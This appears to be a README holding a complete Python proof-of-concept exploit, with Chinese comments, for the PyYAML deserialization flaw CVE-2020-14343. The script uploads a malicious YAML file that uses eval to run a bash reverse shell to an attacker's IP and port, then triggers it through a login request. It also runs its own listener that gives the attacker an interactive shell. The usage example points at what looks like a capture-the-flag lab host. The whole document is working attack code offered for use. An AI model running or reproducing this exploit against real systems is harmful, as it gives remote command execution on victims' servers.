README.md
Rendering markdown...
import requests
import sys
import threading
import socket
import time
def exploit(target_url, attacker_ip, attacker_port):
"""
CVE-2020-14343 POC - PyYAML反序列化漏洞利用
"""
# 构造恶意的YAML payload
malicious_yaml = f"""host: {attacker_ip}
info: Test
user: Admin
x: !!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('bash -c \\\"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\\\"')"]
"""
# 准备上传的文件
files = {
'file': ('userConfig.yaml', malicious_yaml, 'application/x-yaml')
}
# 第一步:上传恶意YAML文件
print(f"[+] 上传恶意YAML文件到 {target_url}/upload")
try:
upload_response = requests.post(
f"{target_url}/upload",
files=files,
allow_redirects=False
)
print(f"[+] 上传响应: {upload_response.status_code}")
except Exception as e:
print(f"[-] 上传失败: {e}")
return False
# 第二步:触发反序列化漏洞
print(f"[+] 触发反序列化漏洞...")
login_data = {
'username': 'Admin',
'password': '123456'
}
try:
# 使用session保持cookie
session = requests.Session()
# 发送登录请求触发漏洞
login_response = session.post(
f"{target_url}/login",
data=login_data,
headers={'Content-Type': 'application/x-www-form-urlencoded'}
)
print(f"[+] 登录响应: {login_response.status_code}")
if login_response.status_code == 200:
print("[+] 漏洞利用成功!检查反弹shell连接...")
return True
else:
print(f"[-] 可能利用失败,状态码: {login_response.status_code}")
return False
except Exception as e:
print(f"[-] 触发漏洞失败: {e}")
return False
def start_listener(port):
"""
启动简单的TCP监听器来接收反弹shell
"""
print(f"[*] 在端口 {port} 启动监听器...")
try:
# 创建socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', port))
s.listen(1)
print(f"[+] 监听器已在 0.0.0.0:{port} 启动")
conn, addr = s.accept()
print(f"[+] 收到来自 {addr[0]}:{addr[1]} 的连接!")
# 简单的交互
while True:
try:
# 接收数据
data = conn.recv(1024)
if not data:
break
print(data.decode('utf-8', errors='ignore'), end='')
# 发送命令
cmd = input()
if cmd.strip().lower() == 'exit':
break
conn.send((cmd + '\n').encode())
except KeyboardInterrupt:
print("\n[*] 用户中断")
break
except Exception as e:
print(f"\n[-] 错误: {e}")
break
conn.close()
s.close()
except Exception as e:
print(f"[-] 监听器错误: {e}")
def main():
if len(sys.argv) != 4:
print("用法: python cve-2020-14343_poc.py <目标URL> <攻击者IP> <攻击者端口>")
print("示例: python cve-2020-14343_poc.py http://eci-2ze9naefg4wclmatagkc.cloudeci1.ichunqiu.com 192.168.1.100 4444")
sys.exit(1)
target_url = sys.argv[1]
attacker_ip = sys.argv[2]
attacker_port = int(sys.argv[3])
print(f"[*] CVE-2020-14343 PyYAML反序列化漏洞利用")
print(f"[*] 目标: {target_url}")
print(f"[*] 反弹shell到: {attacker_ip}:{attacker_port}")
# 在新线程中启动监听器
listener_thread = threading.Thread(target=start_listener, args=(attacker_port,))
listener_thread.daemon = True
listener_thread.start()
# 等待监听器启动
time.sleep(2)
# 执行漏洞利用
print("\n[*] 开始漏洞利用...")
if exploit(target_url, attacker_ip, attacker_port):
print("[+] 漏洞利用完成!")
else:
print("[-] 漏洞利用失败!")
# 等待连接
try:
print("\n[*] 等待反弹shell连接... (Ctrl+C 退出)")
listener_thread.join()
except KeyboardInterrupt:
print("\n[*] 退出程序")
if __name__ == "__main__":
main()